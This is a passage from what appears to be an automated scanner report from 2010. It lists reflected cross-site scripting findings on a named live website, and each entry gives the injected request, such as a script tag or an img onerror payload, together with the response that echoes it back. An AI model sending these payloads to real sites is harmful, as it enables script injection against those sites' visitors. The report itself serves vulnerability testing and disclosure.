GET /tag79e5d<script>alert(1)</script>4f596f321e3/uk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag79e5d<script>alert(1)</script>4f596f321e3/uk was not found on this server.</p>
...[SNIP]...

2.4647. http://www.resellerbase.com/tag/uk [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec180<script>alert(1)</script>7623eed0258ed27fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagec180<script>alert(1)</script>7623eed0258ed27fd/uk?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagec180<script>alert(1)</script>7623eed0258ed27fd/uk?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4648. http://www.resellerbase.com/tag/uk [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 72867</title><img%20src%3da%20onerror%3dalert(1)>705b9c299ff453966 was submitted in the REST URL parameter 2. This input was echoed as 72867</title><img src=a onerror=alert(1)>705b9c299ff453966 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/uk72867</title><img%20src%3da%20onerror%3dalert(1)>705b9c299ff453966?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: uk72867</title><img src=a onerror=alert(1)>705b9c299ff453966</title>
...[SNIP]...

2.4649. http://www.resellerbase.com/tag/uk [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff70e<img%20src%3da%20onerror%3dalert(1)>2cac81f788053fd02 was submitted in the REST URL parameter 2. This input was echoed as ff70e<img src=a onerror=alert(1)>2cac81f788053fd02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/ukff70e<img%20src%3da%20onerror%3dalert(1)>2cac81f788053fd02?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ukff7
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ukff70e<img src=a onerror=alert(1)>2cac81f788053fd02]</td>
...[SNIP]...

2.4650. http://www.resellerbase.com/tag/uk [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 806be</title><img%20src%3da%20onerror%3dalert(1)>2350ee1411b was submitted in the REST URL parameter 2. This input was echoed as 806be</title><img src=a onerror=alert(1)>2350ee1411b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/uk806be</title><img%20src%3da%20onerror%3dalert(1)>2350ee1411b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: uk806be</title><img src=a onerror=alert(1)>2350ee1411b</title>
...[SNIP]...

2.4651. http://www.resellerbase.com/tag/uk [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d03bc<img%20src%3da%20onerror%3dalert(1)>ff04ecf52e1 was submitted in the REST URL parameter 2. This input was echoed as d03bc<img src=a onerror=alert(1)>ff04ecf52e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ukd03bc<img%20src%3da%20onerror%3dalert(1)>ff04ecf52e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ukd03
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ukd03bc<img src=a onerror=alert(1)>ff04ecf52e1]</td>
...[SNIP]...

2.4652. http://www.resellerbase.com/tag/uptime+monitoring [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uptime+monitoring

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f3ea<script>alert(1)</script>fb11fe36193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag7f3ea<script>alert(1)</script>fb11fe36193/uptime+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag7f3ea<script>alert(1)</script>fb11fe36193/uptime+monitoring was not found on this server.</p>
...[SNIP]...

2.4653. http://www.resellerbase.com/tag/vaccation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81800<script>alert(1)</script>be379b613fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag81800<script>alert(1)</script>be379b613fb/vaccation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag81800<script>alert(1)</script>be379b613fb/vaccation was not found on this server.</p>
...[SNIP]...

2.4654. http://www.resellerbase.com/tag/vaccation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a55b7<script>alert(1)</script>cccef581c9225d3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /taga55b7<script>alert(1)</script>cccef581c9225d3b3/vaccation?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga55b7<script>alert(1)</script>cccef581c9225d3b3/vaccation?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4655. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2227d</title><img%20src%3da%20onerror%3dalert(1)>883114d19f6afd05e was submitted in the REST URL parameter 2. This input was echoed as 2227d</title><img src=a onerror=alert(1)>883114d19f6afd05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/vaccation2227d</title><img%20src%3da%20onerror%3dalert(1)>883114d19f6afd05e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vaccation2227d</title><img src=a onerror=alert(1)>883114d19f6afd05e</title>
...[SNIP]...

2.4656. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6453<img%20src%3da%20onerror%3dalert(1)>acd1559bbc13782f6 was submitted in the REST URL parameter 2. This input was echoed as e6453<img src=a onerror=alert(1)>acd1559bbc13782f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/vaccatione6453<img%20src%3da%20onerror%3dalert(1)>acd1559bbc13782f6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vacca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : vaccatione6453<img src=a onerror=alert(1)>acd1559bbc13782f6]</td>
...[SNIP]...

2.4657. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0ae9<img%20src%3da%20onerror%3dalert(1)>c75e49d437b was submitted in the REST URL parameter 2. This input was echoed as b0ae9<img src=a onerror=alert(1)>c75e49d437b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/vaccationb0ae9<img%20src%3da%20onerror%3dalert(1)>c75e49d437b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vacca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : vaccationb0ae9<img src=a onerror=alert(1)>c75e49d437b]</td>
...[SNIP]...

2.4658. http://www.resellerbase.com/tag/vaccation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e3f98</title><img%20src%3da%20onerror%3dalert(1)>450a296a467 was submitted in the REST URL parameter 2. This input was echoed as e3f98</title><img src=a onerror=alert(1)>450a296a467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/vaccatione3f98</title><img%20src%3da%20onerror%3dalert(1)>450a296a467 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: vaccatione3f98</title><img src=a onerror=alert(1)>450a296a467</title>
...[SNIP]...

2.4659. http://www.resellerbase.com/tag/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1a1d<script>alert(1)</script>92b998eb80489c8b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /taga1a1d<script>alert(1)</script>92b998eb80489c8b1/video?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga1a1d<script>alert(1)</script>92b998eb80489c8b1/video?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4660. http://www.resellerbase.com/tag/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a98d6<script>alert(1)</script>b0acc950819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga98d6<script>alert(1)</script>b0acc950819/video HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga98d6<script>alert(1)</script>b0acc950819/video was not found on this server.</p>
...[SNIP]...

2.4661. http://www.resellerbase.com/tag/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9303c</title><img%20src%3da%20onerror%3dalert(1)>acfd50e02256f8470 was submitted in the REST URL parameter 2. This input was echoed as 9303c</title><img src=a onerror=alert(1)>acfd50e02256f8470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/video9303c</title><img%20src%3da%20onerror%3dalert(1)>acfd50e02256f8470?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video9303c</title><img src=a onerror=alert(1)>acfd50e02256f8470</title>
...[SNIP]...

2.4662. http://www.resellerbase.com/tag/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8e19f</title><img%20src%3da%20onerror%3dalert(1)>2fd751c93f8 was submitted in the REST URL parameter 2. This input was echoed as 8e19f</title><img src=a onerror=alert(1)>2fd751c93f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/video8e19f</title><img%20src%3da%20onerror%3dalert(1)>2fd751c93f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video8e19f</title><img src=a onerror=alert(1)>2fd751c93f8</title>
...[SNIP]...

2.4663. http://www.resellerbase.com/tag/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 648cb<img%20src%3da%20onerror%3dalert(1)>b23d6872cd3 was submitted in the REST URL parameter 2. This input was echoed as 648cb<img src=a onerror=alert(1)>b23d6872cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/video648cb<img%20src%3da%20onerror%3dalert(1)>b23d6872cd3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

